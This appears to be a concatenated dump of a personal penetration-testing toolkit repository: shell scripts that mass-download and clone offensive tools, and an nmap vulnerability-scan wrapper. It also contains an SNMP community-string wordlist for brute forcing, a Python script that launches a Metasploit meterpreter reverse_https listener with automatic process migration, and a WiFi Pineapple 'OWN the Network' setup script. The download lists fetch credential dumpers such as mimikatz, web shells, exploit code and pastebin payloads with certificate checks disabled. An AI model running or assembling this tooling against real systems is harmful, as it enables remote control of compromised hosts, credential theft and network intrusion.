3 | git add -A * -f 4 | git commit -m "adding a few tools" 5 | git push -u origin master 6 | -------------------------------------------------------------------------------- /gitupdate.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | cd ../ 3 | for i in `ls` 4 | do 5 | cd $i 6 | sudo git pull 2>&1 2>/dev/null 7 | cd /opt 8 | done 9 | -------------------------------------------------------------------------------- /gitupdate2.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | cd /Applications/GITLIST-PACKAGES 3 | for i in `ls` 4 | do 5 | cd $i 6 | sudo git pull 2>&1 2>/dev/null 7 | cd /Applications/GITLIST-PACKAGES 8 | done 9 | -------------------------------------------------------------------------------- /jk-fierce.tar: -------------------------------------------------------------------------------- 1 | jk-fierce/000755 000766 000024 00000000000 12647706124 014310 5ustar00james.kellystaff000000 000000 jk-fierce/hosts.txt000644 000766 000024 00000000011 12647706100 016173 0ustar00james.kellystaff000000 000000 1617 2 | -------------------------------------------------------------------------------- /jk-fierce/hosts.txt: -------------------------------------------------------------------------------- 1 | 1617 2 | -------------------------------------------------------------------------------- /jknmap: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | if [ $# -ne 1 ]; then 3 | echo 1>&2 "usage: jknmap hostname" 4 | exit 127 5 | fi 6 | # sudo nmap -sS -sV --script=vulscan/vulscan.nse $1 && \ 7 | # sudo nmap -sS -sV --script=vulscan/vulscan.nse –script-args vulscandb=scipvuldb.csv $1 && \ 8 | # sudo nmap -sS -sV --script=vulscan/vulscan.nse –script-args vulscandb=scipvuldb.csv -p80 $1 && \ 9 | # sudo nmap -PN -sS -sV --script=vulscan –script-args vulscancorrelation=1 -p80 $1 && \ 10 | # sudo nmap -sV --script=vuln $1 && \ 11 | # sudo nmap -PN -sS -sV --script=all –script-args vulscancorrelation=1 $1 && \ 12 | #--------------------------------------------------------------------------------------- 13 | sudo nmap -sV -sC $1 14 | #sudo nmap -p 443 --script ssl-ccs-injection $1 CHECK SYNTAX key 15 | sudo nmap -sV -sC -vv $1 16 | #sudo nmap --script=ssl-date $1 && \ 17 | echo "Enumerating SSL ciphers." && \ 18 | sudo nmap --script ssl-enum-ciphers -p 443 $1 && \ 19 | echo "Enumerating Accepted Ciphers with SSLscan" && \ 20 | sslscan $1 | grep Accepted > sslscan-accepted.txt && \ 21 | echo "Checking for heartbleed." && \ 22 | sudo nmap -p 443 --script ssl-heartbleed $1 && \ 23 | echo "Checking for ssl known key." && \ 24 | sudo nmap --script ssl-known-key -p 443 $1 && \ 25 | echo "Checking for POODLE" && \ 26 | sudo nmap -sV --version-light --script ssl-poodle -p 443 $1 && \ 27 | echo "Checking for HTTP methods." && \ 28 | sudo nmap --script http-methods --script-args http.url-path='/' $1 && \ 29 | echo "Checking for TRACE method." && \ 30 | sudo nmap --script http-trace -d $1 && \ 31 | echo "Checking for method tamper." && \ 32 | sudo nmap -sV --script http-method-tamper $1 && \ 33 | echo "Checking for slowloris" && \ 34 | sudo nmap --script http-slowloris-check $1 && \ 35 | echo "--SYNFULKNOCK--" 36 | nmap -sS -Pn -n -T4 -p 80 --script synfulknock $1 37 | echo TESTTESTTEST 38 | nmap -Pn -sV -sC -p 443,80 --script ssl-enum-ciphers,ssl-heartbleed,ssl-known-key,ssl-poodle,http-trace,http-method-tamper,http-slowloris-check,all-cipher-checks,synfulknock $1 && \ 39 | #--------------------------------------------------------------------------------------- 40 | 41 | 42 | echo "--WHATWEB--" && \ 43 | whatweb $1 44 | -------------------------------------------------------------------------------- /macosxhack.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env sh 2 | 3 | ## 4 | # This is script with usefull tips taken from: 5 | # https://github.com/mathiasbynens/dotfiles/blob/master/.osx 6 | # 7 | # install it: 8 | # curl -sL https://raw.github.com/gist/2108403/hack.sh | sh 9 | # 10 | 11 | echo "Enable full keyboard access for all controls (e.g. enable Tab in modal dialogs)" 12 | defaults write NSGlobalDomain AppleKeyboardUIMode -int 3 13 | 14 | echo "Enable subpixel font rendering on non-Apple LCDs" 15 | defaults write NSGlobalDomain AppleFontSmoothing -int 2 16 | 17 | echo "Enable the 2D Dock" 18 | defaults write com.apple.dock no-glass -bool true 19 | 20 | # Automatically hide and show the Dock 21 | # defaults write com.apple.dock autohide -bool true 22 | 23 | echo "Make Dock icons of hidden applications translucent" 24 | defaults write com.apple.dock showhidden -bool true 25 | 26 | echo "Enable iTunes track notifications in the Dock" 27 | defaults write com.apple.dock itunes-notifications -bool true 28 | 29 | # Disable menu bar transparency 30 | defaults write NSGlobalDomain AppleEnableMenuBarTransparency -bool false 31 | 32 | # Show remaining battery time; hide percentage 33 | # defaults write com.apple.menuextra.battery ShowPercent -string "NO" 34 | # defaults write com.apple.menuextra.battery ShowTime -string "YES" 35 | 36 | # echo "Always show scrollbars" 37 | # defaults write NSGlobalDomain AppleShowScrollBars -string "Auto" 38 | 39 | echo "Allow quitting Finder via ⌘ + Q; doing so will also hide desktop icons" 40 | defaults write com.apple.finder QuitMenuItem -bool true 41 | 42 | # Disable window animations and Get Info animations in Finder 43 | # defaults write com.apple.finder DisableAllAnimations -bool true 44 | 45 | echo "Show all filename extensions in Finder" 46 | defaults write NSGlobalDomain AppleShowAllExtensions -bool true 47 | 48 | echo "Use current directory as default search scope in Finder" 49 | defaults write com.apple.finder FXDefaultSearchScope -string "SCcf" 50 | 51 | echo "Show Path bar in Finder" 52 | defaults write com.apple.finder ShowPathbar -bool true 53 | 54 | echo "Show Status bar in Finder" 55 | defaults write com.apple.finder ShowStatusBar -bool true 56 | 57 | echo "Expand save panel by default" 58 | defaults write NSGlobalDomain NSNavPanelExpandedStateForSaveMode -bool true 59 | 60 | echo "Expand print panel by default" 61 | defaults write NSGlobalDomain PMPrintingExpandedStateForPrint -bool true 62 | 63 | echo "Disable the “Are you sure you want to open this application?” dialog" 64 | defaults write com.apple.LaunchServices LSQuarantine -bool false 65 | 66 | echo "Disable shadow in screenshots" 67 | defaults write com.apple.screencapture disable-shadow -bool true 68 | 69 | echo "Enable highlight hover effect for the grid view of a stack (Dock)" 70 | defaults write com.apple.dock mouse-over-hilte-stack -bool true 71 | 72 | echo "Enable spring loading for all Dock items" 73 | defaults write enable-spring-load-actions-on-all-items -bool true 74 | 75 | echo "Show indicator lights for open applications in the Dock" 76 | defaults write com.apple.dock show-process-indicators -bool true 77 | 78 | # Don’t animate opening applications from the Dock 79 | # defaults write com.apple.dock launchanim -bool false 80 | 81 | echo "Display ASCII control characters using caret notation in standard text views" 82 | # Try e.g. `cd /tmp; unidecode "\x{0000}" > cc.txt; open -e cc.txt` 83 | defaults write NSGlobalDomain NSTextShowsControlCharacters -bool true 84 | 85 | echo "Disable press-and-hold for keys in favor of key repeat" 86 | defaults write NSGlobalDomain ApplePressAndHoldEnabled -bool false 87 | 88 | echo "Set a blazingly fast keyboard repeat rate" 89 | defaults write NSGlobalDomain KeyRepeat -int 0.02 90 | 91 | echo "Set a shorter Delay until key repeat" 92 | defaults write NSGlobalDomain InitialKeyRepeat -int 12 93 | 94 | echo "Disable auto-correct" 95 | defaults write NSGlobalDomain NSAutomaticSpellingCorrectionEnabled -bool false 96 | 97 | # Disable opening and closing window animations 98 | # defaults write NSGlobalDomain NSAutomaticWindowAnimationsEnabled -bool false 99 | 100 | echo "Enable AirDrop over Ethernet and on unsupported Macs running Lion" 101 | defaults write com.apple.NetworkBrowser BrowseAllInterfaces -bool true 102 | 103 | echo "Disable disk image verification" 104 | defaults write com.apple.frameworks.diskimages skip-verify -bool true 105 | defaults write com.apple.frameworks.diskimages skip-verify-locked -bool true 106 | defaults write com.apple.frameworks.diskimages skip-verify-remote -bool true 107 | 108 | echo "Automatically open a new Finder window when a volume is mounted" 109 | defaults write com.apple.frameworks.diskimages auto-open-ro-root -bool true 110 | defaults write com.apple.frameworks.diskimages auto-open-rw-root -bool true 111 | defaults write com.apple.finder OpenWindowForNewRemovableDisk -bool true 112 | 113 | echo "Display full POSIX path as Finder window title" 114 | defaults write com.apple.finder _FXShowPosixPathInTitle -bool true 115 | 116 | # Increase window resize speed for Cocoa applications 117 | defaults write NSGlobalDomain NSWindowResizeTime -float 0.001 118 | 119 | echo "Avoid creating .DS_Store files on network volumes" 120 | defaults write com.apple.desktopservices DSDontWriteNetworkStores -bool true 121 | 122 | echo "Disable the warning when changing a file extension" 123 | defaults write com.apple.finder FXEnableExtensionChangeWarning -bool false 124 | 125 | echo "Show item info below desktop icons" 126 | /usr/libexec/PlistBuddy -c "Set :DesktopViewSettings:IconViewSettings:showItemInfo true" ~/Library/Preferences/com.apple.finder.plist 127 | 128 | echo "Enable snap-to-grid for desktop icons" 129 | /usr/libexec/PlistBuddy -c "Set :DesktopViewSettings:IconViewSettings:arrangeBy grid" ~/Library/Preferences/com.apple.finder.plist 130 | 131 | echo "Disable the warning before emptying the Trash" 132 | defaults write com.apple.finder WarnOnEmptyTrash -bool false 133 | 134 | # Empty Trash securely by default 135 | # defaults write com.apple.finder EmptyTrashSecurely -bool true 136 | 137 | echo "Require password immediately after sleep or screen saver begins" 138 | defaults write com.apple.screensaver askForPassword -int 1 139 | defaults write com.apple.screensaver askForPasswordDelay -int 0 140 | 141 | echo "Enable tap to click (Trackpad)" 142 | defaults write com.apple.driver.AppleBluetoothMultitouch.trackpad Clicking -bool true 143 | 144 | echo "Map bottom right Trackpad corner to right-click" 145 | defaults write com.apple.driver.AppleBluetoothMultitouch.trackpad TrackpadCornerSecondaryClick -int 2 146 | defaults write com.apple.driver.AppleBluetoothMultitouch.trackpad TrackpadRightClick -bool true 147 | 148 | echo "Disable Safari’s thumbnail cache for History and Top Sites" 149 | defaults write com.apple.Safari DebugSnapshotsUpdatePolicy -int 2 150 | 151 | echo "Enable Safari’s debug menu" 152 | defaults write com.apple.Safari IncludeInternalDebugMenu -bool true 153 | 154 | echo "Make Safari’s search banners default to Contains instead of Starts With" 155 | defaults write com.apple.Safari FindOnPageMatchesWordStartsOnly -bool false 156 | 157 | # Remove useless icons from Safari’s bookmarks bar 158 | # defaults write com.apple.Safari ProxiesInBookmarksBar "()" 159 | 160 | echo "Add a context menu item for showing the Web Inspector in web views" 161 | defaults write NSGlobalDomain WebKitDeveloperExtras -bool true 162 | 163 | echo "Only use UTF-8 in Terminal.app" 164 | defaults write com.apple.terminal StringEncodings -array 4 165 | 166 | echo "Disable the Ping sidebar in iTunes" 167 | defaults write com.apple.iTunes disablePingSidebar -bool true 168 | 169 | echo "Disable all the other Ping stuff in iTunes" 170 | defaults write com.apple.iTunes disablePing -bool true 171 | 172 | echo "Make ⌘ + F focus the search input in iTunes" 173 | defaults write com.apple.iTunes NSUserKeyEquivalents -dict-add "Target Search Field" "@F" 174 | 175 | # Disable send and reply animations in Mail.app 176 | # defaults write com.apple.Mail DisableReplyAnimations -bool true 177 | # defaults write com.apple.Mail DisableSendAnimations -bool true 178 | 179 | # Disable Resume system-wide 180 | # defaults write NSGlobalDomain NSQuitAlwaysKeepsWindows -bool false 181 | 182 | echo "Disable the “reopen windows when logging back in” option" 183 | # This works, although the checkbox will still appear to be checked. 184 | defaults write com.apple.loginwindow TALLogoutSavesState -bool false 185 | defaults write com.apple.loginwindow LoginwindowLaunchesRelaunchApps -bool false 186 | 187 | echo "Enable Dashboard dev mode (allows keeping widgets on the desktop)" 188 | defaults write com.apple.dashboard devmode -bool true 189 | 190 | echo "Reset Launchpad" 191 | [ -e ~/Library/Application\ Support/Dock/*.db ] && rm ~/Library/Application\ Support/Dock/*.db 192 | 193 | echo "Show the ~/Library folder" 194 | chflags nohidden ~/Library 195 | 196 | echo "Disable local Time Machine backups" 197 | hash tmutil &> /dev/null && sudo tmutil disablelocal 198 | 199 | echo "Remove Dropbox’s green checkmark icons in Finder" 200 | file=/Applications/Dropbox.app/Contents/Resources/check.icns 201 | [ -e "$file" ] && mv -f "$file" "$file.bak" 202 | unset file 203 | 204 | #Fix for the ancient UTF-8 bug in QuickLook (http://mths.be/bbo) 205 | # Commented out, as this is known to cause problems when saving files in Adobe Illustrator CS5 :( 206 | #echo "0x08000100:0" > ~/.CFUserTextEncoding 207 | 208 | echo "Kill affected applications" 209 | for app in Safari Finder Dock Mail SystemUIServer; do killall "$app" >/dev/null 2>&1; done -------------------------------------------------------------------------------- /powershell.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | a=`cat <<-EOF 3 | https://github.com/ChrisTruncer/WMIOps.git 4 | https://github.com/Kevin-Robertson/Inveigh.git 5 | https://github.com/PowerShellEmpire/Empire.git 6 | https://github.com/PowerShellEmpire/PowerTools.git 7 | https://github.com/PowerShellMafia/PowerSploit.git 8 | https://github.com/PyroTek3/PowerShell-AD-Recon.git 9 | https://github.com/Shellntel/scripts.git 10 | https://github.com/Veil-Framework/Veil.git 11 | https://github.com/besimorhino/powercat.git 12 | https://github.com/byt3bl33d3r/CrackMapExec.git 13 | https://github.com/darkoperator/Posh-SSH.git 14 | https://github.com/darkoperator/Posh-SecMod.git 15 | https://github.com/denandz/KeeFarce.git 16 | https://github.com/iagox86/dnscat2.git 17 | https://github.com/mattifestation/PowerShellArsenal 18 | https://github.com/mattifestation/PowerShellArsenal.git 19 | https://github.com/mattifestation/PowerSploit.git 20 | https://github.com/morgoroth/Veil-PowerView.git 21 | https://github.com/rvrsh3ll/POSH-Commander.git 22 | https://github.com/samratashok/nishang.git 23 | https://github.com/secabstraction/Create-WMIshell.git 24 | https://github.com/secabstraction/PowerCat.git 25 | https://github.com/secabstraction/WmiSploit.git 26 | https://github.com/vacmf/powershell-scripts.git 27 | https://github.com/xorrior/RandomPS-Scripts.git 28 | https://github.com/ChrisTruncer/WMIOps.git 29 | https://github.com/HarmJ0y/CheatSheets.git 30 | https://github.com/enigma0x3/Powershell-Payload-Excel-Delivery.git 31 | https://github.com/tfairane/DocDropper.git 32 | https://github.com/Kevin-Robertson/Tater.git 33 | https://github.com/jaredhaight/PSAttack.git 34 | EOF` 35 | cd /var/www 36 | for i in $a 37 | do 38 | git clone $i 39 | done 40 | -------------------------------------------------------------------------------- /replace-openjdk-with-oraclejdk.txt: -------------------------------------------------------------------------------- 1 | I may attempt to move over to the new VM to finish out the training tomorrow. We can decide 2 | as a class in the morning. In the mean time, use the following guide to remove the 3 | troublesome version of Java and install a functional version on the original VM, not the one 4 | we used for most of the day today. If you have any questions or issues, please contact me or 5 | arrive early tomorrow and I can help. Have a good evening. 6 | 7 | Remove old version of Java 8 | ========================== 9 | sudo apt-get purge openjdk* 10 | 11 | Install new version of Java 12 | =========================== 13 | sudo add-apt-repository ppa:webupd8team/java 14 | sudo apt-get update 15 | sudo apt-get install oracle-java8-installer 16 | 17 | Verify Java install 18 | =================== 19 | java -version 20 | 21 | Optional cleanup 22 | ================ 23 | sudo apt-get autoremove 24 | 25 | Tim Tomes 26 | @lanmaster53 27 | http://www.lanmaster53.com 28 | http://appsec.rocks 29 | -------------------------------------------------------------------------------- /snmp-all-community.txt: -------------------------------------------------------------------------------- 1 | 0 2 | 0392a0 3 | 1234 4 | 2read 5 | 4changes 6 | access 7 | adm 8 | admin 9 | Admin 10 | agent 11 | agent_steal 12 | all 13 | all private 14 | all public 15 | ANYCOM 16 | apc 17 | bintec 18 | blue 19 | c 20 | C0de 21 | cable-d 22 | cacti 23 | canon_admin 24 | cc 25 | cisco 26 | CISCO 27 | community 28 | compaq 29 | compaq1 30 | Compaq1 31 | COMPAQ1 32 | core 33 | CR52401 34 | debug 35 | default 36 | dilbert 37 | enable 38 | field 39 | field-service 40 | freekevin 41 | fubar 42 | guest 43 | hello 44 | hideit 45 | host 46 | hp 47 | HP 48 | hp1 49 | HP1 50 | hp_admin 51 | hpsnmp 52 | HPsnmp 53 | HPSNMP 54 | hpsnmp1 55 | ibm 56 | IBM 57 | ilmi 58 | ILMI 59 | intermec 60 | Intermec 61 | internal 62 | l2 63 | l3 64 | liteon 65 | manager 66 | mngt 67 | monitor 68 | mrtg 69 | nagios 70 | netman 71 | network 72 | NoGaH$@! 73 | none 74 | notsopublic 75 | ntopia 76 | openview 77 | OrigEquipMfr 78 | ourCommStr 79 | pass 80 | password 81 | pr1v4t3 82 | pr1vat3 83 | private 84 | Private 85 | PRIVATE 86 | private1 87 | PRIVATE1 88 | private@es0 89 | Private@es0 90 | private@es1 91 | Private@es1 92 | proxy 93 | publ1c 94 | public 95 | Public 96 | PUBLIC 97 | public1 98 | PUBLIC1 99 | public@es0 100 | public@es1 101 | public/RO 102 | read 103 | read-only 104 | readwrite 105 | read-write 106 | red 107 | regional 108 | 109 | rmon 110 | rmon_admin 111 | ro 112 | root 113 | router 114 | rw 115 | rwa 116 | s!a@m#n$p%c 117 | sanfran 118 | san-fran 119 | scotty 120 | secret 121 | Secret 122 | SECRET 123 | security 124 | Security 125 | SECURITY 126 | seri 127 | snmp 128 | SNMP 129 | snmpd 130 | snmp-get 131 | snmptrap 132 | SNMP_trap 133 | SNMPv1/v2c 134 | SNMPv2c 135 | solaris 136 | solarwinds 137 | sun 138 | SUN 139 | superuser 140 | switch 141 | Switch 142 | SWITCH 143 | system 144 | System 145 | SYSTEM 146 | tech 147 | test 148 | TEST 149 | test2 150 | tiv0li 151 | tivoli 152 | topsecret 153 | traffic 154 | trap 155 | watch 156 | watchit 157 | world 158 | write 159 | writeit 160 | xyzzy 161 | yellow 162 | -------------------------------------------------------------------------------- /start-listener.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # 3 | # StartListener.py 4 | # Simple python script to start a Meterpreter HTTPs Handler 5 | # by Chris Campbell (obscuresec) 6 | # 7 | import sys 8 | import subprocess 9 | 10 | #write a resource file and call it 11 | def build(lhost,lport): 12 | options = "use multi/handler\n" 13 | options += "set payload windows/meterpreter/reverse_https\nset LHOST {0}\nset LPORT {1}\n".format(lhost,lport) 14 | options += "set ExitOnSession false\nset AutoRunScript post/windows/manage/smart_migrate\nexploit -j\n" 15 | filewrite = file("listener.rc", "w") 16 | filewrite.write(options) 17 | filewrite.close() 18 | subprocess.Popen("/opt/metasploit/app/msfconsole -r listener.rc", shell=True).wait() 19 | 20 | #grab args 21 | try: 22 | lhost = sys.argv[1] 23 | lport = sys.argv[2] 24 | build(lhost,lport) 25 | 26 | #index error 27 | except IndexError: 28 | print "python StartListener.py lhost lport" -------------------------------------------------------------------------------- /svn.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | cd /opt 3 | #svn checkout http://nipper-ng.googlecode.com/svn/trunk/nipper-ng-read-only 4 | -------------------------------------------------------------------------------- /wgetlist.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | a=`cat <<-EOF 3 | http://downloads.sourceforge.net/project/yokoso/yokoso-0.1/yokoso.0.1.tar.gz 4 | https://raw.github.com/hdm/scan-tools/master/nse/banner-plus.nse 5 | https://labs.portcullis.co.uk/download/wordpress-build-review_v1.0.tar.gz 6 | https://labs.portcullis.co.uk/download/rdp-sec-check-0.9.tgz 7 | https://labs.portcullis.co.uk/download/allthevhosts.tar.gz 8 | https://labs.portcullis.co.uk/download/ssl-cipher-suite-enum-v0.9.9.tar.gz 9 | https://labs.portcullis.co.uk/download/SSHatter-1.0.tar.gz 10 | http://dev.zenoss.org/svn/trunk/inst/externallibs/wmi-1.3.7.tar.bz2 11 | https://labs.portcullis.co.uk/download/enum4linux-0.8.9.tar.gz 12 | http://www.exploit-db.com/download/19091 13 | http://www.ampliasecurity.com/research/wce_v1_4beta_x32.zip 14 | https://raw.githubusercontent.com/zacinaction/kicksat-groundstation/master/SpriteReceiver.grc 15 | https://github.com/CCSIR/PHP-EXIF-Backdoors-generator-using-custom-shellcode/raw/master/shellcode.php 16 | http://downloads.sourceforge.net/project/aspshell/aspshell/aspshell%200.2/aspshell-0.2.zip 17 | https://davtest.googlecode.com/files/davtest-1.0.zip 18 | https://github.com/obscuresec/random/raw/master/StartListener.py 19 | http://fimap.googlecode.com/files/fimap_alpha_v09.tar.gz 20 | https://ua-tester.googlecode.com/files/UAtester_PTEG.mht 21 | http://valgrind.org/downloads/valgrind-3.9.0.tar.bz2 22 | https://hash-identifier.googlecode.com/files/Hash_ID_v1.1.py 23 | https://bitbucket.org/ariya/phantomjs/downloads/phantomjs-1.9.7-linux-x86_64.tar.bz2 24 | http://sparty.secniche.org/sparty_v_0.1.tar.gz 25 | http://downloads.sourceforge.net/project/spscan/spscan-v1.tar.gz 26 | http://downloads.sourceforge.net/project/netoolsh/opensource.tar.gz 27 | https://fimap.googlecode.com/files/fimap_alpha_v09.tar.gz 28 | http://downloads.sourceforge.net/project/moscrack/moscrack-2.08b.tar.gz 29 | https://subterfuge.googlecode.com/files/subterfuge_1.0-1_all.deb 30 | http://www.toolswatch.org/dpe/dpeparser.py 31 | https://labs.portcullis.co.uk/download/hoppy-1.8.1.tar.bz2 32 | https://media.defcon.org/dc-18/tools/dc-18-isr-evilgrade-1.0.0.tar.gz 33 | https://media.defcon.org/dc-18/tools/dc-18-bluetooth.zip 34 | https://media.defcon.org/dc-16/tools/modscan_0.1.tar 35 | https://media.defcon.org/dc-16/tools/squirtle-1.1a.zip 36 | https://media.defcon.org/dc-16/tools/voiper-0.07.tar.gz 37 | http://kmkeen.com/tmp/heatmap.py.txt 38 | http://www.exploresecurity.com/wp-content/uploads/custom/william.sh 39 | ftp://ftp.freeradius.org/pub/radius/old/freeradius-server-2.1.12.tar.bz2 40 | https://raw.github.com/brad-anton/freeradius-wpe/master/freeradius-wpe.patch 41 | https://autocrack.googlecode.com/files/autocrack3.1.sh 42 | https://autosploit.googlecode.com/files/autosploit.pl 43 | http://downloads.sourceforge.net/project/watobo/watobo_0.9.5rev226.zip 44 | http://www.baudline.com/baudline_1.08_linux_x86_64.tar.gz 45 | http://www.sharebrained.com/downloads/gnuradio/microphone_shure.grc 46 | https://github.com/greatscottgadgets/ubertooth/archive/2014-04-R1.tar.gz 47 | https://github.com/downloads/hpux735/Cocoa-Radio/CocoaRadio.zip 48 | http://nodejs.org/dist/v0.10.31/node-v0.10.31-linux-x64.tar.gz 49 | https://github.com/Jermolene/TiddlyWiki5.git 50 | http://www.gat3way.eu/poc/swscan.tgz 51 | http://live.sysinternals.com/psexec.exe 52 | http://www.wxtoimg.com/downloads/wxtoimg-linux64-2.10.11-1.tar.gz 53 | http://debianuser.org/bruteforce/passlist.txt 54 | http://debianuser.org/bruteforce/brutessh.zip 55 | http://downloads.sourceforge.net/jrdesktop/jrdesktop-0.2.0030.bin.zip 56 | https://www.dropbox.com/s/1j6v6zbtsdg1kam/Kerberoast.pdf 57 | http://www.ampliasecurity.com/research/wce_v1_41beta_universal.zip 58 | https://web.archive.org/web/20130806142902/http://download.sysinternals.com/files/Procdump.zip 59 | https://www.trustedsec.com/files/encrypted_http_shell.zip 60 | https://www.trustedsec.com/files/SqlBrute.zip 61 | https://www.trustedsec.com/files/delldrac.py 62 | http://download.sysinternals.com/files/PSTools.zip 63 | https://download.elasticsearch.org/elasticsearch/elasticsearch/elasticsearch-1.4.2.deb 64 | http://www.w1hkj.com/downloads/fldigi/fldigi-3.22.05.tar.gz 65 | http://www.wirelessdefence.org/Contents/Files/aircrack-ptw-1.0.0.tar.gz 66 | http://downloads.sourceforge.net/project/wapiti/wapiti/wapiti-2.3.0/wapiti-2.3.0.tar.gz 67 | https://github.com/ikkisoft/bradamsa/releases/download/v0.2/bradamsa0.2.jar 68 | https://owasp-testing-checklist.googlecode.com/files/OWASPTestingChecklist_v_1.0.xls 69 | https://fimap.googlecode.com/files/fimap_alpha_v09.tar.gz 70 | https://squirtle.googlecode.com/files/squirtle-1.1a.zip 71 | http://sniff.su/Intercepter-NG.CE.05.zip 72 | http://comax.fr/yamas/bt5/yamas.sh 73 | http://downloads.sourceforge.net/project/airpwn/airpwn/1.4/airpwn-1.4.tgz 74 | https://github.com/gentilkiwi/mimikatz/releases/download/2.0.0-alpha-20151113/mimikatz_trunk.zip 75 | https://github.com/adafruit/Adafruit-Pi-Finder/releases/download/v2.0.1-beta/pibootstrap_linux64.tar.gz 76 | http://www.securitysift.com/download/linuxprivchecker.py 77 | http://pentestmonkey.net/tools/unix-privesc-check/unix-privesc-check-1.4.tar.gz 78 | www.securitysift.com/download/linuxprivchecker.py 79 | https://www.trustedsec.com/files/PowerShell_PoC.zip 80 | https://www.trustedsec.com/files/egressbuster.zip 81 | https://www.trustedsec.com/files/encrypted_http_shell.zip 82 | https://www.trustedsec.com/files/egress_buster_revshell.zip 83 | http://marathontool.codeplex.com/# 84 | https://raw.githubusercontent.com/SmeegeSec/Directory_File_Listing_Parser_Importer/master/Directory-File-Listing-Parser-Importer.py 85 | http://www.ittools.se/security%20tools/gsecdump-0.6-win32.zip 86 | http://www.ittools.se/security%20tools/gsecdump-v2b5.exe 87 | http://www.ittools.se/security%20tools/IeInfo.exe 88 | http://www.ittools.se/security%20tools/iTouch.exe 89 | http://www.ittools.se/security%20tools/lslsass32.exe 90 | http://www.ittools.se/security%20tools/lslsass64.exe 91 | http://www.ittools.se/security%20tools/MssqlBf.exe 92 | http://www.ittools.se/security%20tools/msvctl_0.3.zip 93 | http://www.ittools.se/security%20tools/ntdd.exe 94 | http://www.ittools.se/security%20tools/ntlsobj.exe 95 | http://www.ittools.se/security%20tools/parallel_task.js 96 | http://www.ittools.se/security%20tools/runhash32.exe 97 | http://www.ittools.se/security%20tools/runhash64.exe 98 | http://www.ittools.se/security%20tools/vscompat2k.exe 99 | https://raw.githubusercontent.com/carnal0wnage/Metasploit-Code/master/modules/post/windows/gather/gold_digger.rb 100 | https://github.com/ChrisTruncer/Egress-Assess/archive/1.0.zip 101 | https://github.com/xtr4nge/FruityWifi/archive/v2.2.zip 102 | http://www.andlabs.org/tools/sotf/Shell%20of%20the%20Future_v0.9.zip 103 | http://www.andlabs.org/tools/imposter/imposter_v0.9.zip 104 | http://www.computec.ch/projekte/vulscan/download/nmap_nse_vulscan-2.0.tar.gz 105 | https://github.com/Arachni/arachni/releases/download/v1.2.1/arachni-1.2.1-0.5.7.1-linux-x86_64.tar.gz 106 | http://hostap.epitest.fi/releases/hostapd-2.2.tar.gz 107 | https://goofile.googlecode.com/files/goofilev1.5.zip 108 | https://raw.githubusercontent.com/tennc/xss/master/xss-payloads/Xenotix-payloads.list 109 | https://github.com/byt3bl33d3r/gcat/archive/master.zip 110 | http://ptscripts.googlecode.com/svn/trunk/dshashes.py 111 | https://raw.githubusercontent.com/HackerFantastic/Public/master/exploits/heartbleed.c 112 | https://github.com/OWASP/O-Saft/raw/master/o-saft.tgz 113 | https://github.com/xtr4nge/FruityWifi/archive/v2.2.zip 114 | https://github.com/RandomStorm/Bluto/archive/v1.1.5.tar.gz 115 | www.ernw.de/download/dnsdigger.zip 116 | http://lcamtuf.coredump.cx/afl/releases/afl-latest.tgz 117 | http://blog.0x0lab.org/wp-content/uploads/2010/06/dict_populator.zip 118 | http://hashcat.net/files/hashcat-0.50.7z 119 | http://home.btconnect.com/md5decrypter/HashcatGUI_044.zip 120 | https://github.com/entropy1337/infernal-twin/archive/master.zip 121 | http://downloads.sourceforge.net/project/isic/isic/ISIC%20v0.07/isic-0.07.tgz 122 | http://www.thc.org/releases/hydra-8.1.tar.gz 123 | https://code.google.com/p/littleblackbox/downloads/detail?name=littleblackbox-0.1.3.tar.gz 124 | https://github.com/ElevenPaths/EvilFOCA/releases/download/0.1.4.0/EvilFoca.zip 125 | https://bitbucket.org/grimhacker/gpppfinder/downloads 126 | https://bitbucket.org/atlas0fd00m/rfcat/downloads/rfcat_150225.tgz 127 | http://pastebin.com/raw/1pH95aep 128 | http://pastebin.com/raw/8CepfW8p 129 | https://github.com/pentestmonkey/windows-privesc-check/archive/master.zip 130 | https://labs.portcullis.co.uk/download/whoislikeaboss.tar.gz 131 | https://labs.portcullis.co.uk/download/hoppy-1.8.1.tar.bz2 132 | https://github.com/trustedsec/unicorn/archive/2.3.zip 133 | https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/gnucitizen/proxify-Linux.tar.gz 134 | EOF` 135 | cd ../ 136 | for i in $a 137 | do 138 | wget --no-check-certificate $i 139 | done 140 | rm /opt/*.1 141 | rm /opt/*.2 142 | -------------------------------------------------------------------------------- /wp5.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | #define variables 3 | 4 | echo "$(tput setaf 3) _ ___ _______ ____ _ __ " 5 | echo " | | / (_) ____(_) / __ \\(_)___ ___ ____ _____ ____ / /__ " 6 | echo " | | /| / / / /_ / / / /_/ / / __ \/ _ \/ __ '/ __ \/ __ \/ / _ \\" 7 | echo " | |/ |/ / / __/ / / / ____/ / / / / __/ /_/ / /_/ / /_/ / / __/" 8 | echo " |__/|__/_/_/ /_/ /_/ /_/_/ /_/\___/\__,_/ .___/ .___/_/\___/ " 9 | echo " $(tput sgr0) OWN the Network $(tput setaf 3)/_/ /_/$(tput sgr0) v2.2" 10 | echo "" 11 | 12 | echo -n "Pineapple Netmask [255.255.255.0]: " 13 | read pineapplenetmask 14 | if [[ $pineapplenetmask == '' ]]; then 15 | pineapplenetmask=255.255.255.0 #Default netmask for /24 network 16 | fi 17 | 18 | echo -n "Pineapple Network [172.16.42.0/24]: " 19 | read pineapplenet 20 | if [[ $pineapplenet == '' ]]; then 21 | pineapplenet=172.16.42.0/24 # Pineapple network. Default is 172.16.42.0/24 22 | fi 23 | 24 | echo -n "Interface between PC and Pineapple [eth0]: " 25 | read pineapplelan 26 | if [[ $pineapplelan == '' ]]; then 27 | pineapplelan=eth0 # Interface of ethernet cable directly connected to Pineapple 28 | fi 29 | 30 | echo -n "Interface between PC and Internet [wlan0]: " 31 | read pineapplewan 32 | if [[ $pineapplewan == '' ]]; then 33 | pineapplewan=wlan0 #i.e. wlan0 for wifi, ppp0 for 3g modem/dialup, eth0 for lan 34 | fi 